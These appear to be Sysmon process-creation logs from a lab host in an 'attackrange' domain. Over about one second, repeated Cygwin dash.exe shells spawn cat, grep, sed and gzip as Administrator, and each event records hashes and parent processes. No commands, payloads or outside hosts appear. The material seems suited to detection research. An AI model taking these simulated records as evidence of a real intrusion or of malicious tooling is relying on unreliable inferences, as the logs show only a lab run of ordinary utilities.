14:55:54.514{A8622C2F-53FA-6078-6208-00000000AE01}3304C:\cygwin64\bin\dash.exe-----"C:\cygwin64\bin\dash.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=13A2EF33299A78FD1CF57C64EE770C89,SHA256=8E0DCE0940EE068089BD369F4E1FA70E01005C11DDD33CAF1FDF947202FE485A,IMPHASH=75EFD9C0CB70189EBD8D54FB49C5CEA2{A8622C2F-53F9-6078-C807-00000000AE01}1580C:\cygwin64\bin\dash.exe"C:\cygwin64\bin\dash.exe" 154100x800000000000000046675Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 
14:55:54.506{A8622C2F-53FA-6078-6108-00000000AE01}4364C:\cygwin64\bin\cat.exe-----"C:\cygwin64\bin\cat.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=ADF5161F9576FAB9D0DF99ED7FE60B1D,SHA256=1DD069EF0DC312E8F4CA7E4D20C785612D23A138D93A1553D564C0EABA45B2B5,IMPHASH=1E615C60AEF3904C527727A2505D9B81{A8622C2F-53FA-6078-6008-00000000AE01}6032C:\cygwin64\bin\dash.exe"C:\cygwin64\bin\dash.exe" 154100x800000000000000046665Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:55:54.499{A8622C2F-53FA-6078-6008-00000000AE01}6032C:\cygwin64\bin\dash.exe-----"C:\cygwin64\bin\dash.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=13A2EF33299A78FD1CF57C64EE770C89,SHA256=8E0DCE0940EE068089BD369F4E1FA70E01005C11DDD33CAF1FDF947202FE485A,IMPHASH=75EFD9C0CB70189EBD8D54FB49C5CEA2{A8622C2F-53F9-6078-C807-00000000AE01}1580C:\cygwin64\bin\dash.exe"C:\cygwin64\bin\dash.exe" 154100x800000000000000046652Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:55:54.491{A8622C2F-53FA-6078-5F08-00000000AE01}7140C:\cygwin64\bin\sed.exe-----"C:\cygwin64\bin\sed.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=0B641D33E8C3F5C21382EB8CB9D2C2CD,SHA256=78354D46F5E67DCDBED0FAAF1FF83CA2CE83715D3CC77CDE71C1BA8CC3FE01D5,IMPHASH=A10FE840069588D724DECD69D92555B1{A8622C2F-53FA-6078-5D08-00000000AE01}3008C:\cygwin64\bin\dash.exe"C:\cygwin64\bin\dash.exe" 154100x800000000000000046634Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 
14:55:54.483{A8622C2F-53FA-6078-5E08-00000000AE01}5412C:\cygwin64\bin\grep.exe-----"C:\cygwin64\bin\grep.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=CA1CD62425F876E4BC2C9CAB8BA8E1FD,SHA256=A1E5531CDC240EB71083B84EA6CDFEDA5FD6BC25F2A586D52E9EF93E590D3CB6,IMPHASH=967DF82421BE009A6974726B7AE3D8E8{A8622C2F-53FA-6078-5B08-00000000AE01}6452C:\cygwin64\bin\dash.exe"C:\cygwin64\bin\dash.exe" 154100x800000000000000046632Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:55:54.483{A8622C2F-53FA-6078-5D08-00000000AE01}3008C:\cygwin64\bin\dash.exe-----"C:\cygwin64\bin\dash.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=13A2EF33299A78FD1CF57C64EE770C89,SHA256=8E0DCE0940EE068089BD369F4E1FA70E01005C11DDD33CAF1FDF947202FE485A,IMPHASH=75EFD9C0CB70189EBD8D54FB49C5CEA2{A8622C2F-53F9-6078-C807-00000000AE01}1580C:\cygwin64\bin\dash.exe"C:\cygwin64\bin\dash.exe" 154100x800000000000000046614Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:55:54.476{A8622C2F-53FA-6078-5C08-00000000AE01}5396C:\cygwin64\bin\gzip.exe-----"C:\cygwin64\bin\gzip.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=69CEDD6B542D0FF34889F3722B561A72,SHA256=0BF19AC24F15A5F11BC9A99336A736C11F63261AE1809E7663C37CC3FA144880,IMPHASH=A380123EE5A1337EA05DC013C75D0A34{A8622C2F-53FA-6078-5A08-00000000AE01}3208C:\cygwin64\bin\dash.exe"C:\cygwin64\bin\dash.exe" 154100x800000000000000046612Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 
14:55:54.476{A8622C2F-53FA-6078-5B08-00000000AE01}6452C:\cygwin64\bin\dash.exe-----"C:\cygwin64\bin\dash.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=13A2EF33299A78FD1CF57C64EE770C89,SHA256=8E0DCE0940EE068089BD369F4E1FA70E01005C11DDD33CAF1FDF947202FE485A,IMPHASH=75EFD9C0CB70189EBD8D54FB49C5CEA2{A8622C2F-53F9-6078-C807-00000000AE01}1580C:\cygwin64\bin\dash.exe"C:\cygwin64\bin\dash.exe" 154100x800000000000000046600Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:55:54.469{A8622C2F-53FA-6078-5A08-00000000AE01}3208C:\cygwin64\bin\dash.exe-----"C:\cygwin64\bin\dash.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=13A2EF33299A78FD1CF57C64EE770C89,SHA256=8E0DCE0940EE068089BD369F4E1FA70E01005C11DDD33CAF1FDF947202FE485A,IMPHASH=75EFD9C0CB70189EBD8D54FB49C5CEA2{A8622C2F-53F9-6078-C807-00000000AE01}1580C:\cygwin64\bin\dash.exe"C:\cygwin64\bin\dash.exe" 154100x800000000000000046588Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:55:54.461{A8622C2F-53FA-6078-5908-00000000AE01}6968C:\cygwin64\bin\cat.exe-----"C:\cygwin64\bin\cat.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=ADF5161F9576FAB9D0DF99ED7FE60B1D,SHA256=1DD069EF0DC312E8F4CA7E4D20C785612D23A138D93A1553D564C0EABA45B2B5,IMPHASH=1E615C60AEF3904C527727A2505D9B81{A8622C2F-53FA-6078-5808-00000000AE01}6884C:\cygwin64\bin\dash.exe"C:\cygwin64\bin\dash.exe" 154100x800000000000000046578Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 
14:55:54.027{A8622C2F-53FA-6078-1008-00000000AE01}3008C:\cygwin64\bin\dash.exe-----"C:\cygwin64\bin\dash.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=13A2EF33299A78FD1CF57C64EE770C89,SHA256=8E0DCE0940EE068089BD369F4E1FA70E01005C11DDD33CAF1FDF947202FE485A,IMPHASH=75EFD9C0CB70189EBD8D54FB49C5CEA2{A8622C2F-53F9-6078-C807-00000000AE01}1580C:\cygwin64\bin\dash.exe"C:\cygwin64\bin\dash.exe" 154100x800000000000000045769Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:55:54.016{A8622C2F-53FA-6078-0F08-00000000AE01}4568C:\cygwin64\bin\sed.exe-----"C:\cygwin64\bin\sed.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=0B641D33E8C3F5C21382EB8CB9D2C2CD,SHA256=78354D46F5E67DCDBED0FAAF1FF83CA2CE83715D3CC77CDE71C1BA8CC3FE01D5,IMPHASH=A10FE840069588D724DECD69D92555B1{A8622C2F-53FA-6078-0D08-00000000AE01}6592C:\cygwin64\bin\dash.exe"C:\cygwin64\bin\dash.exe" 154100x800000000000000045754Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:55:54.009{A8622C2F-53FA-6078-0E08-00000000AE01}5516C:\cygwin64\bin\grep.exe-----"C:\cygwin64\bin\grep.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=CA1CD62425F876E4BC2C9CAB8BA8E1FD,SHA256=A1E5531CDC240EB71083B84EA6CDFEDA5FD6BC25F2A586D52E9EF93E590D3CB6,IMPHASH=967DF82421BE009A6974726B7AE3D8E8{A8622C2F-53FA-6078-0B08-00000000AE01}1496C:\cygwin64\bin\dash.exe"C:\cygwin64\bin\dash.exe" 154100x800000000000000045751Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 
14:55:54.009{A8622C2F-53FA-6078-0D08-00000000AE01}6592C:\cygwin64\bin\dash.exe-----"C:\cygwin64\bin\dash.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=13A2EF33299A78FD1CF57C64EE770C89,SHA256=8E0DCE0940EE068089BD369F4E1FA70E01005C11DDD33CAF1FDF947202FE485A,IMPHASH=75EFD9C0CB70189EBD8D54FB49C5CEA2{A8622C2F-53F9-6078-C807-00000000AE01}1580C:\cygwin64\bin\dash.exe"C:\cygwin64\bin\dash.exe" 154100x800000000000000045737Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:55:54.001{A8622C2F-53FA-6078-0C08-00000000AE01}6968C:\cygwin64\bin\gzip.exe-----"C:\cygwin64\bin\gzip.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=69CEDD6B542D0FF34889F3722B561A72,SHA256=0BF19AC24F15A5F11BC9A99336A736C11F63261AE1809E7663C37CC3FA144880,IMPHASH=A380123EE5A1337EA05DC013C75D0A34{A8622C2F-53F9-6078-0A08-00000000AE01}1476C:\cygwin64\bin\dash.exe"C:\cygwin64\bin\dash.exe" 154100x800000000000000045735Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:55:54.001{A8622C2F-53FA-6078-0B08-00000000AE01}1496C:\cygwin64\bin\dash.exe-----"C:\cygwin64\bin\dash.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=13A2EF33299A78FD1CF57C64EE770C89,SHA256=8E0DCE0940EE068089BD369F4E1FA70E01005C11DDD33CAF1FDF947202FE485A,IMPHASH=75EFD9C0CB70189EBD8D54FB49C5CEA2{A8622C2F-53F9-6078-C807-00000000AE01}1580C:\cygwin64\bin\dash.exe"C:\cygwin64\bin\dash.exe" 154100x800000000000000045723Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 
14:55:53.994{A8622C2F-53F9-6078-0A08-00000000AE01}1476C:\cygwin64\bin\dash.exe-----"C:\cygwin64\bin\dash.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=13A2EF33299A78FD1CF57C64EE770C89,SHA256=8E0DCE0940EE068089BD369F4E1FA70E01005C11DDD33CAF1FDF947202FE485A,IMPHASH=75EFD9C0CB70189EBD8D54FB49C5CEA2{A8622C2F-53F9-6078-C807-00000000AE01}1580C:\cygwin64\bin\dash.exe"C:\cygwin64\bin\dash.exe" 154100x800000000000000045710Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:55:53.985{A8622C2F-53F9-6078-0908-00000000AE01}5804C:\cygwin64\bin\cat.exe-----"C:\cygwin64\bin\cat.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=ADF5161F9576FAB9D0DF99ED7FE60B1D,SHA256=1DD069EF0DC312E8F4CA7E4D20C785612D23A138D93A1553D564C0EABA45B2B5,IMPHASH=1E615C60AEF3904C527727A2505D9B81{A8622C2F-53F9-6078-0808-00000000AE01}4336C:\cygwin64\bin\dash.exe"C:\cygwin64\bin\dash.exe" 154100x800000000000000045696Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:55:53.978{A8622C2F-53F9-6078-0808-00000000AE01}4336C:\cygwin64\bin\dash.exe-----"C:\cygwin64\bin\dash.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=13A2EF33299A78FD1CF57C64EE770C89,SHA256=8E0DCE0940EE068089BD369F4E1FA70E01005C11DDD33CAF1FDF947202FE485A,IMPHASH=75EFD9C0CB70189EBD8D54FB49C5CEA2{A8622C2F-53F9-6078-C807-00000000AE01}1580C:\cygwin64\bin\dash.exe"C:\cygwin64\bin\dash.exe" 154100x800000000000000045688Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 
14:55:53.969{A8622C2F-53F9-6078-0708-00000000AE01}6040C:\cygwin64\bin\sed.exe-----"C:\cygwin64\bin\sed.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=0B641D33E8C3F5C21382EB8CB9D2C2CD,SHA256=78354D46F5E67DCDBED0FAAF1FF83CA2CE83715D3CC77CDE71C1BA8CC3FE01D5,IMPHASH=A10FE840069588D724DECD69D92555B1{A8622C2F-53F9-6078-0508-00000000AE01}2084C:\cygwin64\bin\dash.exe"C:\cygwin64\bin\dash.exe" 154100x800000000000000045670Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:55:53.960{A8622C2F-53F9-6078-0608-00000000AE01}2508C:\cygwin64\bin\grep.exe-----"C:\cygwin64\bin\grep.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=CA1CD62425F876E4BC2C9CAB8BA8E1FD,SHA256=A1E5531CDC240EB71083B84EA6CDFEDA5FD6BC25F2A586D52E9EF93E590D3CB6,IMPHASH=967DF82421BE009A6974726B7AE3D8E8{A8622C2F-53F9-6078-0308-00000000AE01}6336C:\cygwin64\bin\dash.exe"C:\cygwin64\bin\dash.exe" 154100x800000000000000045668Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:55:53.960{A8622C2F-53F9-6078-0508-00000000AE01}2084C:\cygwin64\bin\dash.exe-----"C:\cygwin64\bin\dash.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=13A2EF33299A78FD1CF57C64EE770C89,SHA256=8E0DCE0940EE068089BD369F4E1FA70E01005C11DDD33CAF1FDF947202FE485A,IMPHASH=75EFD9C0CB70189EBD8D54FB49C5CEA2{A8622C2F-53F9-6078-C807-00000000AE01}1580C:\cygwin64\bin\dash.exe"C:\cygwin64\bin\dash.exe" 154100x800000000000000045651Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 
14:55:53.953{A8622C2F-53F9-6078-0408-00000000AE01}5084C:\cygwin64\bin\gzip.exe-----"C:\cygwin64\bin\gzip.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=69CEDD6B542D0FF34889F3722B561A72,SHA256=0BF19AC24F15A5F11BC9A99336A736C11F63261AE1809E7663C37CC3FA144880,IMPHASH=A380123EE5A1337EA05DC013C75D0A34{A8622C2F-53F9-6078-0208-00000000AE01}5664C:\cygwin64\bin\dash.exe"C:\cygwin64\bin\dash.exe" 154100x800000000000000045650Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:55:53.953{A8622C2F-53F9-6078-0308-00000000AE01}6336C:\cygwin64\bin\dash.exe-----"C:\cygwin64\bin\dash.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=13A2EF33299A78FD1CF57C64EE770C89,SHA256=8E0DCE0940EE068089BD369F4E1FA70E01005C11DDD33CAF1FDF947202FE485A,IMPHASH=75EFD9C0CB70189EBD8D54FB49C5CEA2{A8622C2F-53F9-6078-C807-00000000AE01}1580C:\cygwin64\bin\dash.exe"C:\cygwin64\bin\dash.exe" 154100x800000000000000045636Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:55:53.945{A8622C2F-53F9-6078-0208-00000000AE01}5664C:\cygwin64\bin\dash.exe-----"C:\cygwin64\bin\dash.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=13A2EF33299A78FD1CF57C64EE770C89,SHA256=8E0DCE0940EE068089BD369F4E1FA70E01005C11DDD33CAF1FDF947202FE485A,IMPHASH=75EFD9C0CB70189EBD8D54FB49C5CEA2{A8622C2F-53F9-6078-C807-00000000AE01}1580C:\cygwin64\bin\dash.exe"C:\cygwin64\bin\dash.exe" 154100x800000000000000045624Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 
14:55:53.937{A8622C2F-53F9-6078-0108-00000000AE01}5404C:\cygwin64\bin\cat.exe-----"C:\cygwin64\bin\cat.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=ADF5161F9576FAB9D0DF99ED7FE60B1D,SHA256=1DD069EF0DC312E8F4CA7E4D20C785612D23A138D93A1553D564C0EABA45B2B5,IMPHASH=1E615C60AEF3904C527727A2505D9B81{A8622C2F-53F9-6078-0008-00000000AE01}6808C:\cygwin64\bin\dash.exe"C:\cygwin64\bin\dash.exe" 154100x800000000000000045614Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:55:53.929{A8622C2F-53F9-6078-0008-00000000AE01}6808C:\cygwin64\bin\dash.exe-----"C:\cygwin64\bin\dash.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=13A2EF33299A78FD1CF57C64EE770C89,SHA256=8E0DCE0940EE068089BD369F4E1FA70E01005C11DDD33CAF1FDF947202FE485A,IMPHASH=75EFD9C0CB70189EBD8D54FB49C5CEA2{A8622C2F-53F9-6078-C807-00000000AE01}1580C:\cygwin64\bin\dash.exe"C:\cygwin64\bin\dash.exe" 154100x800000000000000045602Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:55:53.920{A8622C2F-53F9-6078-FF07-00000000AE01}6332C:\cygwin64\bin\sed.exe-----"C:\cygwin64\bin\sed.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=0B641D33E8C3F5C21382EB8CB9D2C2CD,SHA256=78354D46F5E67DCDBED0FAAF1FF83CA2CE83715D3CC77CDE71C1BA8CC3FE01D5,IMPHASH=A10FE840069588D724DECD69D92555B1{A8622C2F-53F9-6078-FD07-00000000AE01}5628C:\cygwin64\bin\dash.exe"C:\cygwin64\bin\dash.exe" 154100x800000000000000045583Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 
14:55:53.912{A8622C2F-53F9-6078-FE07-00000000AE01}5776C:\cygwin64\bin\grep.exe-----"C:\cygwin64\bin\grep.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=CA1CD62425F876E4BC2C9CAB8BA8E1FD,SHA256=A1E5531CDC240EB71083B84EA6CDFEDA5FD6BC25F2A586D52E9EF93E590D3CB6,IMPHASH=967DF82421BE009A6974726B7AE3D8E8{A8622C2F-53F9-6078-FB07-00000000AE01}3176C:\cygwin64\bin\dash.exe- 154100x800000000000000045581Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:55:53.912{A8622C2F-53F9-6078-FD07-00000000AE01}5628C:\cygwin64\bin\dash.exe-----"C:\cygwin64\bin\dash.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=13A2EF33299A78FD1CF57C64EE770C89,SHA256=8E0DCE0940EE068089BD369F4E1FA70E01005C11DDD33CAF1FDF947202FE485A,IMPHASH=75EFD9C0CB70189EBD8D54FB49C5CEA2{A8622C2F-53F9-6078-C807-00000000AE01}1580C:\cygwin64\bin\dash.exe"C:\cygwin64\bin\dash.exe" 154100x800000000000000045566Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:55:53.904{A8622C2F-53F9-6078-FB07-00000000AE01}3176C:\cygwin64\bin\dash.exe-----"C:\cygwin64\bin\dash.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=13A2EF33299A78FD1CF57C64EE770C89,SHA256=8E0DCE0940EE068089BD369F4E1FA70E01005C11DDD33CAF1FDF947202FE485A,IMPHASH=75EFD9C0CB70189EBD8D54FB49C5CEA2{A8622C2F-53F9-6078-C807-00000000AE01}1580C:\cygwin64\bin\dash.exe"C:\cygwin64\bin\dash.exe" 154100x800000000000000045565Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 
14:55:53.904{A8622C2F-53F9-6078-FC07-00000000AE01}1348C:\cygwin64\bin\gzip.exe-----"C:\cygwin64\bin\gzip.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=69CEDD6B542D0FF34889F3722B561A72,SHA256=0BF19AC24F15A5F11BC9A99336A736C11F63261AE1809E7663C37CC3FA144880,IMPHASH=A380123EE5A1337EA05DC013C75D0A34{A8622C2F-53F9-6078-FA07-00000000AE01}5144C:\cygwin64\bin\dash.exe- 154100x800000000000000045549Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:55:53.896{A8622C2F-53F9-6078-FA07-00000000AE01}5144C:\cygwin64\bin\dash.exe-----"C:\cygwin64\bin\dash.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=13A2EF33299A78FD1CF57C64EE770C89,SHA256=8E0DCE0940EE068089BD369F4E1FA70E01005C11DDD33CAF1FDF947202FE485A,IMPHASH=75EFD9C0CB70189EBD8D54FB49C5CEA2{A8622C2F-53F9-6078-C807-00000000AE01}1580C:\cygwin64\bin\dash.exe"C:\cygwin64\bin\dash.exe" 154100x800000000000000045537Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:55:53.888{A8622C2F-53F9-6078-F907-00000000AE01}5860C:\cygwin64\bin\cat.exe-----"C:\cygwin64\bin\cat.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=ADF5161F9576FAB9D0DF99ED7FE60B1D,SHA256=1DD069EF0DC312E8F4CA7E4D20C785612D23A138D93A1553D564C0EABA45B2B5,IMPHASH=1E615C60AEF3904C527727A2505D9B81{A8622C2F-53F9-6078-F807-00000000AE01}616C:\cygwin64\bin\dash.exe"C:\cygwin64\bin\dash.exe" 154100x800000000000000045531Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 
14:55:53.880{A8622C2F-53F9-6078-F807-00000000AE01}616C:\cygwin64\bin\dash.exe-----"C:\cygwin64\bin\dash.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=13A2EF33299A78FD1CF57C64EE770C89,SHA256=8E0DCE0940EE068089BD369F4E1FA70E01005C11DDD33CAF1FDF947202FE485A,IMPHASH=75EFD9C0CB70189EBD8D54FB49C5CEA2{A8622C2F-53F9-6078-C807-00000000AE01}1580C:\cygwin64\bin\dash.exe"C:\cygwin64\bin\dash.exe" 154100x800000000000000045515Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:55:53.871{A8622C2F-53F9-6078-F707-00000000AE01}6076C:\cygwin64\bin\sed.exe-----"C:\cygwin64\bin\sed.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=0B641D33E8C3F5C21382EB8CB9D2C2CD,SHA256=78354D46F5E67DCDBED0FAAF1FF83CA2CE83715D3CC77CDE71C1BA8CC3FE01D5,IMPHASH=A10FE840069588D724DECD69D92555B1{A8622C2F-53F9-6078-F507-00000000AE01}1476C:\cygwin64\bin\dash.exe"C:\cygwin64\bin\dash.exe" 154100x800000000000000045496Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:55:53.863{A8622C2F-53F9-6078-F607-00000000AE01}3368C:\cygwin64\bin\grep.exe-----"C:\cygwin64\bin\grep.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=CA1CD62425F876E4BC2C9CAB8BA8E1FD,SHA256=A1E5531CDC240EB71083B84EA6CDFEDA5FD6BC25F2A586D52E9EF93E590D3CB6,IMPHASH=967DF82421BE009A6974726B7AE3D8E8{A8622C2F-53F9-6078-F307-00000000AE01}6240C:\cygwin64\bin\dash.exe"C:\cygwin64\bin\dash.exe" 154100x800000000000000045494Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 
14:55:53.863{A8622C2F-53F9-6078-F507-00000000AE01}1476C:\cygwin64\bin\dash.exe-----"C:\cygwin64\bin\dash.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=13A2EF33299A78FD1CF57C64EE770C89,SHA256=8E0DCE0940EE068089BD369F4E1FA70E01005C11DDD33CAF1FDF947202FE485A,IMPHASH=75EFD9C0CB70189EBD8D54FB49C5CEA2{A8622C2F-53F9-6078-C807-00000000AE01}1580C:\cygwin64\bin\dash.exe"C:\cygwin64\bin\dash.exe" 154100x800000000000000045479Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:55:53.855{A8622C2F-53F9-6078-F407-00000000AE01}2664C:\cygwin64\bin\gzip.exe-----"C:\cygwin64\bin\gzip.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=69CEDD6B542D0FF34889F3722B561A72,SHA256=0BF19AC24F15A5F11BC9A99336A736C11F63261AE1809E7663C37CC3FA144880,IMPHASH=A380123EE5A1337EA05DC013C75D0A34{A8622C2F-53F9-6078-F207-00000000AE01}6040C:\cygwin64\bin\dash.exe- 154100x800000000000000045478Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:55:53.855{A8622C2F-53F9-6078-F307-00000000AE01}6240C:\cygwin64\bin\dash.exe-----"C:\cygwin64\bin\dash.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=13A2EF33299A78FD1CF57C64EE770C89,SHA256=8E0DCE0940EE068089BD369F4E1FA70E01005C11DDD33CAF1FDF947202FE485A,IMPHASH=75EFD9C0CB70189EBD8D54FB49C5CEA2{A8622C2F-53F9-6078-C807-00000000AE01}1580C:\cygwin64\bin\dash.exe"C:\cygwin64\bin\dash.exe" 154100x800000000000000045466Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 
14:55:53.848{A8622C2F-53F9-6078-F207-00000000AE01}6040C:\cygwin64\bin\dash.exe-----"C:\cygwin64\bin\dash.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=13A2EF33299A78FD1CF57C64EE770C89,SHA256=8E0DCE0940EE068089BD369F4E1FA70E01005C11DDD33CAF1FDF947202FE485A,IMPHASH=75EFD9C0CB70189EBD8D54FB49C5CEA2{A8622C2F-53F9-6078-C807-00000000AE01}1580C:\cygwin64\bin\dash.exe"C:\cygwin64\bin\dash.exe" 154100x800000000000000045454Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:55:53.840{A8622C2F-53F9-6078-F107-00000000AE01}5220C:\cygwin64\bin\cat.exe-----"C:\cygwin64\bin\cat.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=ADF5161F9576FAB9D0DF99ED7FE60B1D,SHA256=1DD069EF0DC312E8F4CA7E4D20C785612D23A138D93A1553D564C0EABA45B2B5,IMPHASH=1E615C60AEF3904C527727A2505D9B81{A8622C2F-53F9-6078-F007-00000000AE01}1536C:\cygwin64\bin\dash.exe- 154100x800000000000000045444Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 